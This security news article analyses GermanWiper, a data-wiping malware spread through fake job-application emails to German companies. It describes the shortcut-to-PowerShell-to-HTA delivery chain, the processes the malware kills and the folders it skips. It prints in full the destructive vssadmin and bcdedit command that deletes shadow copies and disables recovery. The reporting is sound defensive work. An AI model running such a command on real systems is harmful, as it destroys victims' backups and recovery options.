‭(818) 482-5207‬ support@enetechnologyservices.com

Multiple German companies were off to a rough start last week when a phishing campaign pushing a data-wiping malware targeted them and asked for a ransom. This wiper is being named GermanWiper due to its targeting of German victims and it being a destructive wiper rather than a ransomware.

The malware was first reported on the BleepingComputer forum on Tuesday, July 30 and users soon learned after examining their files that it is a data wiper, despite it demanding a ransom payment.

No data recovery

After compromising a computer and deleting files, GermanWiper leaves a ransom note indicating that the data was encrypted and would not be decrypted unless BTC 0.15038835 is transferred to a listed bitcoin address.

Even if a victim pays the ransom, the money is wasted because the malware does not encrypt the data but overwrites it with zeroes and ones, destroying it, according to security researcher Michael Gillespie.

The first sample seen by security researchers was built on Monday, July 29. The ID Ransomware service started to receive submissions the same day, a little after 10 AM CEST,  MalwareHunterTeam told BleepingComputer.

The end of the work week (Friday, August 2) saw the highest number of ID Ransomware submissions for GermanWiper indicating that the campaign had hit plenty of targets. After that day, the number dwindled to less than 20.

GermanWiper distribution

GermanWiper is being distributed in Germany through a spam campaign that pretends to be a job applicant named Lena Kretschmer who is submitting their resume.

The emails being sent have the subject “Ihr Stellenangebot – Bewerbung [Your job offer – Application] – Lena Kretschmer” and contain an attachment titled “Unterlagen_Lena_Kretschmer.zip” posing as a document archive.

Spam Email
Spam Email

The attachment contains two files that pretend to be PDF resumes for the sender. Security researcher James found that these PDFs are actually shortcuts (LNK) that execute a PowerShell command to download an HTA file from the expandingdelegation[.]top site and launch it on the local machine.

Malicious Shortcut
Malicious Shortcut

Below you can see the PowerShell command that is executed:

PowerShell Command

When the HTA file is executed, it will download the ransomware executable and save it to the C:\Users\Public folder and as an executable with a three letter file name, BleepingComputer’s analysis found. The wiper is then launched.

How GermanWiper destroys a victim’s data

According to analysis by BleepingComputer, when GermanWiper is first executed, it terminates processes associated with database and other software so that the files can be accessed and wiping becomes possible. The list of terminated processes are below:

notepad.exe
dbeng50.exe
sqbcoreservice.exe
encsvc.exe
mydesktopservice.exe
isqlplussvc.exe
agntsvc.exe
sql.exe
sqld.exe
mysql.exe
mysqld.exe
oracle.exe
        

It then scans the system for files to destroy. When wiping files, it skips files that have certain names, extensions, or are located in particular folders. A list of folders spared by the wiping process is available below. A set of extensions that remain untouched by the malware are present at the end of this article.

windows
recycle.bin
mozilla
google
boot
application data
appdata
program files
program files (x86)
programme
programme (x86)
programdata
perflogs
intel
msocache
system volume information

The reason for skipping them is because they are essential for Windows booting properly and for browsing the web.

Destroying the data is done by overwriting its content with zeroes.

Zeroed out, or wiped, file
Zeroed out, or wiped, file

To make it look like an encryption process occurred, each file is appended to its name a random 5 character extension, such as .08kJA, .AVco3, or .Fi2Ed, as shown below:

Caption

After completing the deletion process, GermanWiper also removes the shadow volume copies and disables Windows automatic startup repair by launching the following commands:

cmd.exe /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

The ransomware also creates a ransom note named Fi2Ed_Entschluesselungs_Anleitung.html that is automatically opened at the end of the wiping procedure. Here, victims find instructions to pay 0.15038835 bitcoins, or approximately $1,600, to the listed bitcoin address.

GermanWiper Ransom Note
GermanWiper Ransom Note

The information is also given to victims through a desktop wallpaper that the malware enables on infected machines. The message translates to “Open Fi2Ed_Entschluesselungs_Anleitung.html to find out how to decode your files.”

The wiper executable contains 36 base64-encoded bitcoin addresses. The malware selects one at random for each victim. The full list of bitcoin addresses are listed in the IOC section at the end of this article.

While the ransom note suggests that the bitcoin addresses are unique per victim as seen by the translated text “Send the following amount to the Bitcoin address generated for you”, the wiper just chooses any of these hardcoded addresses.

We were provided the bitcoin address 19sd86duTh7vkYUwMDJirP1F513Tvwo7fv, which has an incoming transaction with the amount requested by the attacker and another transfer of the same amount to a different wallet.

Ransom note includes tracking script

The ransom note for this wiper includes an interesting bit of JavaScript at the bottom that is executed every time you open the note.

This script, shown below, connects to the wiper’s C2 server and sends the bitcoin address associated with the victim and other information. As the ransom note is automatically opened by the wiper at the end of execution, the attacker uses this script to track the amount of victims.

Tracking Script
Tracking Script

Similar to recent Sodinokibi/REvil campaign

GermanWiper has some similarities with a recent Sodinokibi ransomware campaign that pushed malicious emails impersonating BSI, the German national cybersecurity authority.

As you can see below, the same PowerShell command is used for both pieces of malware, albeit with a different domain as an argument

Campaign similarities

Furthermore, the same delivery method used by Sodinokibi (malicious shortcut files masquerading as PDFs, and the use of HTA to extract and deploy the malware) is observed in the GermanWiper attacks.

The difference is that while the first encrypts the data and allows it to be ransomed, the latter erases it, throwing away the chance to recovery, and now of getting paid.